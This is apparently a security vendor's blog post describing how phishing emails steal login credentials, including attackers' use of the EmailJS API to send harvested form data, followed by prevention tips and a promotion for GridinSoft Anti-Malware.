Email spam has become the prevalent form of phishing and malware spreading for a long time. Among them, credentials theft remains the most common type – even though it is not the most profitable. Nowadays, these attacks obtained another target – compromising business accounts. But how do they work? And how to protect against credentials theft? Let’s get to it one by one.
What is credentials theft?
Credentials theft mostly says for itself, but in the context of email spam, things are not that straightforward. Being the subcategory of phishing, credentials theft supposes the use of a spoofed website that contains a login form. Aside from repeating the design of a login form, hackers try to create a convincing message which forces the victim to follow the link. The justification for that may be different. Such message may ask you to join the online meeting or submit the vacation dates – they try to look naturally. Once the victim types its credentials in the form and presses the login button, hackers receive all the data. Still, it is as easy as you may think of it.
The one particular vector of credentials theft that have become exceptionally popular throughout the last year is business emails. As you may guess, compromising the personal email is not that profitable, despite the fact that it is still prevalent among credential theft attacks. By stealing business emails or accounts, hackers open new, more effective attack vectors, such as spear phishing and whaling. Nonetheless, compromised business accounts are rarely used by the same crooks who perform credentials theft. Instead, such data is sold on the Darknet in a database of the same compromised accounts for a hefty sum.
Modern Credentials Theft Methods
Customising the emails to fit the current agenda, bait the user to follow the link – all these things have not changed much since the very beginning of email spam usage for credential theft. But that is not a story of the way hackers extract the credentials from the spoofed login form. I’ve mentioned that extracting the data is not just about “click the button – send the creds”. In fact, things have got an unexpected twist.
Popular way to send the data to the server from the past – a PHP file formed on the site – is quite easy to block. Most network security applications now block such a way of data sending, as it is considered unsafe even when no malicious intents are suspected. More novice approach – through using Telegram Messenger’s API – is quite easy to block either. To avoid the possible blocks from advanced security solutions, hackers started using an API of a legit mailing service EmailJS.
The API of EmailJS allows for automated email sending, using only the credentials and client-side code. It is quite convenient for spreading templated predefined emails. However, some hackers implemented the API to send the email with data from login form from the compromised site directly to their email. Since the service is recognised as legit, and is used fairly often, blocking it is not an option. Yet meanwhile, hackers keep receiving email credentials without any flaws.
Dangers of Credential Theft
Obviously, sharing access to the email account with a third party is a pretty bad situation. Things become even worse when we talk about compromised business emails – and they are targeted quite often, as I’ve already mentioned. Depending on the type of compromised account, the application may differ, though the instrumentary that hackers apply for using compromised accounts are the same for most cases.
Accounts of home users or ordinary employees are, eventually, the least valuable. Hackers may use them to spread random spam. The efficiency of such mailing may still be slightly higher than during the random account usage – just because these guys’ colleagues and relatives may eat the bait thinking that the message is legitimate.
Accounts of high-tier employees, local celebrities or even top executives are of the biggest value. Such accounts are sometimes traded alone, with the price tag of hundreds of dollars. And such prices are justified, as the guise of mentioned persons can bring hackers much bigger money in return. In this case, more sophisticated email messages are sent, often customised to the topic the recipient may expect from the sender.
Credential Theft Prevention Methods
Well, the question of preventing credential theft and providing suitable protection against it exists for a long time. For that reason, I will not repeat trivial advice like “change passwords” or “don’t follow phishing links”. Instead, I’ll try giving less popular yet effective tips.
Apply using email protection tools. There are plenty of them, though these solutions are spread as add-ons to a stand-alone anti-malware software. Such tools monitor all the attached elements, both links and files, in order to detect whether they contain any malicious things. The problem here is that such add-ons are mostly available to corporate security solutions.
Another approach towards decreasing the probability of successful phishing is using network security tools. Particularly, NDR solutions can effectively detect and weed out potentially dangerous traffic. Ones that apply zero-trust and will effectively deal with the misuse of the aforementioned API are preferred. Overall, NDRs are recommended for implementation in large networks, as it may be troublesome to control it with less advanced tools.
For single users: use anti-malware programs with an advanced network filter. Detecting phishing pages like ones used in credentials theft may not be easy manually, so it is better to give it to a specialised security software. GridinSoft Anti-Malware may offer you such functionality – its network filter is updated each hour, so it won’t miss any malignant sites.